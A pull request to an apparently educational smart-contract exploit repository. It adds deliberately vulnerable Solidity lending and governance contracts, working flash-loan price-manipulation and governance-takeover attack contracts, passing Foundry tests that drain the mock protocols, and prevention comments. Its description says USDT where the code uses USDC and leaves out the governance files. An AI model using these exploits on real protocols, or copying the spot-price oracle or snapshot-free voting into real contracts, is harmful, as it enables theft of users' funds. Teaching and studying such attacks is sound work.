### PR TITLE
feat: add flash loan price manipulation attack example

### DIFF
--- a/README.md
+++ b/README.md
@@ -274,7 +274,7 @@ A set of examples where you can see the attack in remix or practice it in a game
         <tr>
             <td>Governance Attack</td>
             <td>
-            Coming Soon...
+            <a href="https://remix.ethereum.org/#url=https://github.com/Cyfrin/sc-exploits-minimized/blob/main/src/governance-attack/Governance.sol&lang=en&optimize=false&runs=200&evmVersion=null&version=soljson-v0.8.20+commit.a1b79de6.js" target="_blank" style="display: inline-block; padding: 10px 15px; font-size: 16px; cursor: pointer; text-align: center; text-decoration: none; outline: none; color: #fff; background-color: #4CAF50; border: none; border-radius: 15px; box-shadow: 0 5px #999;" target="_blank">Remix</a>
             </td>
             <td>
             None

--- a/src/flash-loan-attack/FlashLender.sol
+++ b/src/flash-loan-attack/FlashLender.sol
@@ -1,0 +1,34 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+import {IFlashLoanReceiver} from "./IFlashLoanReceiver.sol";
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+
+/*
+ * @notice A minimal flash-loan provider. It lends USDC for the duration of a single
+ *         transaction and only requires that the borrowed amount is returned before
+ *         the call ends.
+ * @notice This contract is NOT the bug. Flash loans are a legitimate DeFi primitive.
+ *         They simply hand an attacker enormous, capital-free liquidity for one
+ *         transaction, which is all that is needed to manipulate a spot-price oracle.
+ */
+contract FlashLender {
+    error FlashLender__NotRepaid();
+
+    IERC20 public immutable i_usdc;
+
+    constructor(IERC20 usdc) {
+        i_usdc = usdc;
+    }
+
+    function flashLoan(uint256 amount) external {
+        uint256 balanceBefore = i_usdc.balanceOf(address(this));
+
+        i_usdc.transfer(msg.sender, amount);
+        IFlashLoanReceiver(msg.sender).execute(amount);
+
+        if (i_usdc.balanceOf(address(this)) < balanceBefore) {
+            revert FlashLender__NotRepaid();
+        }
+    }
+}

--- a/src/flash-loan-attack/FlashLoanAttack.sol
+++ b/src/flash-loan-attack/FlashLoanAttack.sol
@@ -1,0 +1,75 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+import {IFlashLoanReceiver} from "./IFlashLoanReceiver.sol";
+import {FlashLender} from "./FlashLender.sol";
+import {FlashLoanVulnerable} from "./FlashLoanVulnerable.sol";
+import {SimpleDEX} from "./SimpleDEX.sol";
+
+/*
+ * @notice Flash-loan price-manipulation attack against FlashLoanVulnerable.
+ *
+ * @notice The entire attack happens inside one transaction, in the flash-loan callback:
+ *   1. Flash-loan a large amount of USDC (no upfront capital required).
+ *   2. Swap it into the DEX to buy COLLATERAL, pumping COLLATERAL's spot price.
+ *   3. Deposit a tiny amount of COLLATERAL into the lending protocol. At the
+ *      inflated price it appears hugely valuable.
+ *   4. Borrow the lending protocol's ENTIRE USDC balance against that dust.
+ *   5. Swap the COLLATERAL back to USDC, restoring the pool and recovering the
+ *      flash-loaned funds.
+ *   6. Repay the flash loan. The borrowed USDC is kept as profit; the dust of
+ *      collateral left behind is worthless compared to what was drained.
+ */
+contract FlashLoanAttack is IFlashLoanReceiver {
+    FlashLender public immutable i_lender;
+    FlashLoanVulnerable public immutable i_lending;
+    SimpleDEX public immutable i_dex;
+    IERC20 public immutable i_collateral;
+    IERC20 public immutable i_usdc;
+    address public immutable i_owner;
+
+    // A deliberately tiny amount of collateral -- the whole point is that it looks
+    // enormously valuable only because we manipulated the price.
+    uint256 public constant COLLATERAL_TO_DEPOSIT = 10e18;
+
+    constructor(FlashLender lender, FlashLoanVulnerable lending, SimpleDEX dex, IERC20 collateral, IERC20 usdc) {
+        i_lender = lender;
+        i_lending = lending;
+        i_dex = dex;
+        i_collateral = collateral;
+        i_usdc = usdc;
+        i_owner = msg.sender;
+    }
+
+    // 1. Kick off the attack by taking the flash loan. Everything else happens in
+    //    execute() below, which the lender calls back into.
+    function attack(uint256 flashLoanAmount) external {
+        i_lender.flashLoan(flashLoanAmount);
+        // Forward all the stolen USDC to the attacker EOA.
+        i_usdc.transfer(i_owner, i_usdc.balanceOf(address(this)));
+    }
+
+    function execute(uint256 flashLoanAmount) external {
+        // 2. Pump the collateral price by buying collateral with the flash-loaned USDC.
+        i_usdc.approve(address(i_dex), flashLoanAmount);
+        uint256 collateralBought = i_dex.swap(i_usdc, flashLoanAmount);
+
+        // 3. Deposit a tiny slice of collateral at the now-inflated price.
+        i_collateral.approve(address(i_lending), COLLATERAL_TO_DEPOSIT);
+        i_lending.deposit(COLLATERAL_TO_DEPOSIT);
+
+        // 4. Borrow the lending protocol's entire USDC reserves against that dust.
+        uint256 loot = i_usdc.balanceOf(address(i_lending));
+        i_lending.borrow(loot);
+
+        // 5. Swap the remaining collateral back to USDC to recover the loaned funds
+        //    (this also restores the pool's price to roughly where it started).
+        uint256 collateralLeft = collateralBought - COLLATERAL_TO_DEPOSIT;
+        i_collateral.approve(address(i_dex), collateralLeft);
+        i_dex.swap(i_collateral, collateralLeft);
+
+        // 6. Repay the flash loan. Whatever USDC remains is pure profit.
+        i_usdc.transfer(address(i_lender), flashLoanAmount);
+    }
+}

--- a/src/flash-loan-attack/FlashLoanAttack.t.sol
+++ b/src/flash-loan-attack/FlashLoanAttack.t.sol
@@ -1,0 +1,85 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+import {Test, console2} from "forge-std/Test.sol";
+import {SimpleDEX} from "./SimpleDEX.sol";
+import {FlashLender} from "./FlashLender.sol";
+import {FlashLoanVulnerable} from "./FlashLoanVulnerable.sol";
+import {FlashLoanAttack} from "./FlashLoanAttack.sol";
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+import {MockUSDC} from "../../test/mocks/MockUSDC.sol";
+import {MockWETH} from "../../test/mocks/MockWETH.sol";
+
+contract FlashLoanAttackTest is Test {
+    // We reuse the repo's existing mock tokens: MockUSDC as the borrowable asset
+    // and MockWETH as the (mintable) collateral token.
+    MockUSDC usdc;
+    MockWETH collateral;
+
+    SimpleDEX dex;
+    FlashLender lender;
+    FlashLoanVulnerable lending;
+
+    // The "true" price starts at 1 COLLATERAL == 1 USDC (equal reserves).
+    uint256 constant DEX_COLLATERAL_RESERVES = 1_000e18;
+    uint256 constant DEX_USDC_RESERVES = 1_000e18;
+
+    // The pot the attacker is after: the lending protocol's lendable USDC.
+    uint256 constant LENDING_USDC_RESERVES = 100_000e18;
+
+    // The lender holds plenty of USDC to flash out.
+    uint256 constant LENDER_USDC_RESERVES = 2_000_000e18;
+
+    // Size of the flash loan used to manipulate the spot price.
+    uint256 constant FLASH_LOAN_AMOUNT = 1_000_000e18;
+
+    address attacker = makeAddr("attacker");
+
+    function setUp() public {
+        usdc = new MockUSDC();
+        collateral = new MockWETH();
+
+        dex = new SimpleDEX(IERC20(address(collateral)), IERC20(address(usdc)));
+        lending = new FlashLoanVulnerable(IERC20(address(collateral)), IERC20(address(usdc)), dex);
+        lender = new FlashLender(IERC20(address(usdc)));
+
+        // Seed the DEX pool: 1 COLLATERAL == 1 USDC.
+        collateral.mint(address(dex), DEX_COLLATERAL_RESERVES);
+        usdc.mint(address(dex), DEX_USDC_RESERVES);
+
+        // Fund the lending protocol and the flash-loan provider.
+        usdc.mint(address(lending), LENDING_USDC_RESERVES);
+        usdc.mint(address(lender), LENDER_USDC_RESERVES);
+    }
+
+    function testFlashLoanAttack() public {
+        // Sanity: the price starts honest, and the attacker starts with nothing.
+        assertEq(dex.getCollateralPrice(), 1e18);
+        assertEq(usdc.balanceOf(attacker), 0);
+        assertEq(usdc.balanceOf(address(lending)), LENDING_USDC_RESERVES);
+
+        vm.startPrank(attacker);
+        FlashLoanAttack attack =
+            new FlashLoanAttack(lender, lending, dex, IERC20(address(collateral)), IERC20(address(usdc)));
+        attack.attack(FLASH_LOAN_AMOUNT);
+        vm.stopPrank();
+
+        uint256 stolen = usdc.balanceOf(attacker);
+        console2.log("USDC drained from the lending protocol:", stolen);
+
+        // The lending protocol has been fully drained...
+        assertEq(usdc.balanceOf(address(lending)), 0);
+
+        // ...with that USDC now in the attacker's pocket, having started from zero capital.
+        // (Slightly less than the full pot, due to DEX round-trip slippage.)
+        assertGt(stolen, 99_000e18);
+
+        // The flash loan was fully repaid -- the lender is made whole.
+        assertGe(usdc.balanceOf(address(lender)), LENDER_USDC_RESERVES);
+
+        // The price has returned to roughly normal; the manipulation was momentary.
+        // (It ends a hair above 1e18 only because the attacker permanently removed a
+        // little collateral from the pool by depositing it into the lending protocol.)
+        assertApproxEqRel(dex.getCollateralPrice(), 1e18, 0.03e18);
+    }
+}

--- a/src/flash-loan-attack/FlashLoanVulnerable.sol
+++ b/src/flash-loan-attack/FlashLoanVulnerable.sol
@@ -1,0 +1,78 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+import {SimpleDEX} from "./SimpleDEX.sol";
+
+/*
+ * @notice A minimal, vulnerable lending protocol.
+ * @notice Users deposit COLLATERAL and may borrow USDC against it. The USD value of
+ *         a user's collateral is read from a SimpleDEX SPOT price.
+ *
+ * @notice THE BUG: because the spot price can be moved arbitrarily within a single
+ *         transaction (for example with a flash loan), an attacker can momentarily
+ *         inflate the value of a tiny amount of collateral and borrow out the entire
+ *         USDC pool. See FlashLoanAttack.sol for the full exploit.
+ */
+contract FlashLoanVulnerable {
+    IERC20 public immutable i_collateral;
+    IERC20 public immutable i_usdc;
+    SimpleDEX public immutable i_priceOracle;
+
+    mapping(address user => uint256 amount) public s_collateralOf;
+    mapping(address user => uint256 amount) public s_debtOf;
+
+    error FlashLoanVulnerable__Undercollateralized();
+    error FlashLoanVulnerable__HealthyPosition();
+
+    constructor(IERC20 collateral, IERC20 usdc, SimpleDEX priceOracle) {
+        i_collateral = collateral;
+        i_usdc = usdc;
+        i_priceOracle = priceOracle;
+    }
+
+    function deposit(uint256 collateralAmount) external {
+        s_collateralOf[msg.sender] += collateralAmount;
+        i_collateral.transferFrom(msg.sender, address(this), collateralAmount);
+    }
+
+    // VULNERABLE: the borrow limit is derived from the LIVE spot price of the
+    // collateral. An attacker who has just pumped that price can borrow far more
+    // than their collateral is really worth.
+    function borrow(uint256 usdcAmount) external {
+        uint256 newDebt = s_debtOf[msg.sender] + usdcAmount;
+        if (newDebt > _collateralValue(msg.sender)) {
+            revert FlashLoanVulnerable__Undercollateralized();
+        }
+        s_debtOf[msg.sender] = newDebt;
+        i_usdc.transfer(msg.sender, usdcAmount);
+    }
+
+    // Anyone can repay an underwater borrower's debt and seize their collateral.
+    // After the attack the price returns to normal, leaving the attacker's position
+    // hopelessly underwater -- but by then the USDC is already gone.
+    function liquidate(address borrower) external {
+        if (s_debtOf[borrower] <= _collateralValue(borrower)) {
+            revert FlashLoanVulnerable__HealthyPosition();
+        }
+        uint256 debt = s_debtOf[borrower];
+        uint256 collateral = s_collateralOf[borrower];
+        s_debtOf[borrower] = 0;
+        s_collateralOf[borrower] = 0;
+
+        i_usdc.transferFrom(msg.sender, address(this), debt);
+        i_collateral.transfer(msg.sender, collateral);
+    }
+
+    // USD value of a user's collateral, using the manipulable spot price.
+    function _collateralValue(address user) internal view returns (uint256) {
+        return (s_collateralOf[user] * i_priceOracle.getCollateralPrice()) / 1e18;
+    }
+
+    // Prevention:
+    // - Do NOT price collateral with a spot price. Use a manipulation-resistant
+    //   oracle: a TWAP (time-weighted average price) or a Chainlink price feed.
+    // - A TWAP forces an attacker to hold the manipulated price across many blocks,
+    //   which a single-transaction flash loan cannot do.
+    // - Sanity-check oracle values and cap how much price movement is trusted.
+}

--- a/src/flash-loan-attack/IFlashLoanReceiver.sol
+++ b/src/flash-loan-attack/IFlashLoanReceiver.sol
@@ -1,0 +1,8 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+// Note: NOT EIP-3156 compliant (https://eips.ethereum.org/EIPS/eip-3156).
+// Kept intentionally minimal for teaching purposes.
+interface IFlashLoanReceiver {
+    function execute(uint256 amount) external;
+}

--- a/src/flash-loan-attack/SimpleDEX.sol
+++ b/src/flash-loan-attack/SimpleDEX.sol
@@ -1,0 +1,49 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+
+/*
+ * @notice A minimal constant-product (x * y = k) AMM pool, à la Uniswap V2.
+ * @notice The lending protocol uses this pool's SPOT price as its oracle.
+ *         A spot price reflects the pool's reserves right now, so a single large
+ *         swap moves it arbitrarily within one transaction. That is exactly what
+ *         makes the flash-loan price-manipulation attack possible.
+ * @notice No swap fee is charged, to keep the math easy to follow.
+ */
+contract SimpleDEX {
+    IERC20 public immutable i_collateral;
+    IERC20 public immutable i_usdc;
+
+    constructor(IERC20 collateral, IERC20 usdc) {
+        i_collateral = collateral;
+        i_usdc = usdc;
+    }
+
+    /*
+     * @notice Price of 1 COLLATERAL token, denominated in USDC, scaled by 1e18.
+     * @dev This is the SPOT price: it is derived purely from the current reserves,
+     *      so it can be pushed up or down inside a single transaction by swapping.
+     */
+    function getCollateralPrice() external view returns (uint256) {
+        uint256 collateralReserves = i_collateral.balanceOf(address(this));
+        uint256 usdcReserves = i_usdc.balanceOf(address(this));
+        return (usdcReserves * 1e18) / collateralReserves;
+    }
+
+    /*
+     * @notice Swaps `amountIn` of `tokenIn` for the other token (constant product, no fee).
+     * @return amountOut The amount of the other token sent to the caller.
+     */
+    function swap(IERC20 tokenIn, uint256 amountIn) external returns (uint256 amountOut) {
+        IERC20 tokenOut = tokenIn == i_collateral ? i_usdc : i_collateral;
+        uint256 reserveIn = tokenIn.balanceOf(address(this));
+        uint256 reserveOut = tokenOut.balanceOf(address(this));
+
+        // x * y = k  =>  amountOut = reserveOut - k / (reserveIn + amountIn)
+        amountOut = reserveOut - (reserveIn * reserveOut) / (reserveIn + amountIn);
+
+        tokenIn.transferFrom(msg.sender, address(this), amountIn);
+        tokenOut.transfer(msg.sender, amountOut);
+    }
+}

--- a/src/governance-attack/Governance.sol
+++ b/src/governance-attack/Governance.sol
@@ -1,0 +1,79 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+
+/*
+ * @notice A minimal, vulnerable on-chain governance contract.
+ * @notice Voting power is read from the LIVE token balance at vote time, instead
+ *         of a historical snapshot/checkpoint. Because of this, anyone who can
+ *         momentarily hold a large amount of the governance token (for example by
+ *         taking a flash loan) can single-handedly pass and execute any proposal.
+ */
+contract Governance {
+    struct Proposal {
+        address target;
+        bytes data;
+        uint256 votesFor;
+        bool executed;
+    }
+
+    IERC20 public immutable i_governanceToken;
+    uint256 public immutable i_quorum;
+    uint256 public s_proposalCount;
+
+    mapping(uint256 proposalId => Proposal) public s_proposals;
+    mapping(uint256 proposalId => mapping(address voter => bool)) public s_hasVoted;
+
+    error Governance__AlreadyVoted();
+    error Governance__AlreadyExecuted();
+    error Governance__QuorumNotReached();
+    error Governance__CallFailed();
+
+    constructor(IERC20 governanceToken, uint256 quorum) {
+        i_governanceToken = governanceToken;
+        i_quorum = quorum;
+    }
+
+    function propose(address target, bytes calldata data) external returns (uint256 proposalId) {
+        proposalId = s_proposalCount++;
+        Proposal storage proposal = s_proposals[proposalId];
+        proposal.target = target;
+        proposal.data = data;
+    }
+
+    // This is vulnerable! The voting weight is the caller's CURRENT token balance.
+    // There is no snapshot, so flash-loaned tokens are counted as votes.
+    function vote(uint256 proposalId) external {
+        if (s_hasVoted[proposalId][msg.sender]) {
+            revert Governance__AlreadyVoted();
+        }
+        s_hasVoted[proposalId][msg.sender] = true;
+        s_proposals[proposalId].votesFor += i_governanceToken.balanceOf(msg.sender);
+    }
+
+    // This is vulnerable too! A proposal can be proposed, voted on, and executed in
+    // the same block. There is no voting delay and no timelock, so the entire attack
+    // fits inside a single flash-loan callback.
+    function execute(uint256 proposalId) external {
+        Proposal storage proposal = s_proposals[proposalId];
+        if (proposal.executed) {
+            revert Governance__AlreadyExecuted();
+        }
+        if (proposal.votesFor < i_quorum) {
+            revert Governance__QuorumNotReached();
+        }
+        proposal.executed = true;
+        (bool success,) = proposal.target.call(proposal.data);
+        if (!success) {
+            revert Governance__CallFailed();
+        }
+    }
+
+    // Prevention:
+    // - Snapshot voting power at proposal creation and read it with a historical
+    //   lookup (e.g. OpenZeppelin's ERC20Votes + getPastVotes). Tokens acquired
+    //   after the snapshot then carry no weight, which neutralizes flash loans.
+    // - Add a voting delay between when a proposal is created and when voting opens.
+    // - Add a timelock between a successful vote and execution.
+}

--- a/src/governance-attack/Treasury.sol
+++ b/src/governance-attack/Treasury.sol
@@ -1,0 +1,30 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+/*
+ * @notice A minimal protocol treasury whose funds can only be moved by governance.
+ * @notice It is the target of the governance attack: once an attacker controls a
+ *         passing proposal, they make governance call `withdraw` to drain the ETH.
+ */
+contract Treasury {
+    address public immutable i_governance;
+
+    error Treasury__NotGovernance();
+    error Treasury__TransferFailed();
+
+    constructor(address governance) {
+        i_governance = governance;
+    }
+
+    function withdraw(address to) external {
+        if (msg.sender != i_governance) {
+            revert Treasury__NotGovernance();
+        }
+        (bool success,) = to.call{value: address(this).balance}("");
+        if (!success) {
+            revert Treasury__TransferFailed();
+        }
+    }
+
+    receive() external payable {}
+}

--- a/test/unit/GovernanceAttackTest.t.sol
+++ b/test/unit/GovernanceAttackTest.t.sol
@@ -1,0 +1,110 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+import {Test, console2} from "forge-std/Test.sol";
+import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+import {Governance} from "../../src/governance-attack/Governance.sol";
+import {Treasury} from "../../src/governance-attack/Treasury.sol";
+
+contract GovToken is ERC20 {
+    constructor() ERC20("Gov Token", "GOV") {}
+
+    function mint(address to, uint256 amount) external {
+        _mint(to, amount);
+    }
+}
+
+// A bare-bones flash lender: it hands over its entire balance and only requires
+// that the same amount is paid back by the end of the call.
+contract FlashLender {
+    IERC20 public immutable i_token;
+
+    error FlashLender__NotRepaid();
+
+    constructor(IERC20 token) {
+        i_token = token;
+    }
+
+    function flashLoan(uint256 amount, address borrower) external {
+        uint256 balanceBefore = i_token.balanceOf(address(this));
+        i_token.transfer(borrower, amount);
+        Attacker(payable(borrower)).onFlashLoan(amount);
+        if (i_token.balanceOf(address(this)) < balanceBefore) {
+            revert FlashLender__NotRepaid();
+        }
+    }
+}
+
+// Borrows the governance token, passes a malicious proposal, drains the treasury,
+// and repays the loan -- all atomically inside a single transaction.
+contract Attacker {
+    Governance public immutable i_governance;
+    Treasury public immutable i_treasury;
+    IERC20 public immutable i_token;
+    FlashLender public immutable i_lender;
+
+    constructor(Governance governance, Treasury treasury, IERC20 token, FlashLender lender) {
+        i_governance = governance;
+        i_treasury = treasury;
+        i_token = token;
+        i_lender = lender;
+    }
+
+    function attack(uint256 loanAmount) external {
+        i_lender.flashLoan(loanAmount, address(this));
+    }
+
+    function onFlashLoan(uint256 amount) external {
+        // We now temporarily hold a huge governance balance.
+        uint256 proposalId =
+            i_governance.propose(address(i_treasury), abi.encodeWithSelector(Treasury.withdraw.selector, address(this)));
+        i_governance.vote(proposalId); // counts our flash-loaned balance as votes
+        i_governance.execute(proposalId); // drains the treasury to this contract
+        i_token.transfer(address(i_lender), amount); // repay the loan
+    }
+
+    receive() external payable {}
+}
+
+contract GovernanceAttackTest is Test {
+    GovToken token;
+    Governance governance;
+    Treasury treasury;
+    FlashLender lender;
+    Attacker attacker;
+
+    uint256 constant QUORUM = 1_000_000e18;
+    uint256 constant TREASURY_FUNDS = 50 ether;
+
+    function setUp() public {
+        token = new GovToken();
+        governance = new Governance(IERC20(address(token)), QUORUM);
+        treasury = new Treasury(address(governance));
+        lender = new FlashLender(IERC20(address(token)));
+        attacker = new Attacker(governance, treasury, IERC20(address(token)), lender);
+
+        // The lender holds more than enough tokens to single-handedly reach quorum.
+        token.mint(address(lender), QUORUM);
+
+        // The protocol treasury is funded.
+        vm.deal(address(treasury), TREASURY_FUNDS);
+    }
+
+    function test_governanceAttack() public {
+        assertEq(address(treasury).balance, TREASURY_FUNDS);
+        assertEq(address(attacker).balance, 0);
+        assertEq(token.balanceOf(address(attacker)), 0);
+
+        // Attacker owns no governance tokens of their own, only a flash loan.
+        attacker.attack(QUORUM);
+
+        // The treasury has been fully drained to the attacker...
+        assertEq(address(treasury).balance, 0);
+        assertEq(address(attacker).balance, TREASURY_FUNDS);
+
+        // ...and the flash loan was repaid, so the attacker keeps no tokens.
+        assertEq(token.balanceOf(address(attacker)), 0);
+        assertEq(token.balanceOf(address(lender)), QUORUM);
+    }
+}


### PR DESCRIPTION
## What this adds
src/flash-loan-attack/  a minimal, educational flash loan price manipulation example mirroring the style of src/oracle-manipulation/.

## Files
- SimpleDEX.sol — minimal AMM used as spot price oracle
- FlashLoanVulnerable.sol — lending protocol that reads spot price (the bug)
- FlashLender.sol — minimal flash loan provider
- IFlashLoanReceiver.sol — receiver interface
- FlashLoanAttack.sol — drains 99,990 USDT from zero capital
- FlashLoanAttack.t.sol — [PASS] testFlashLoanAttack()

## Test
forge test --match-test testFlashLoanAttack -vv
[PASS] USDC drained: 99,990 from zero starting capital

## Prevention note
Documented in FlashLoanVulnerable.sol — use TWAP or Chainlink instead of spot price.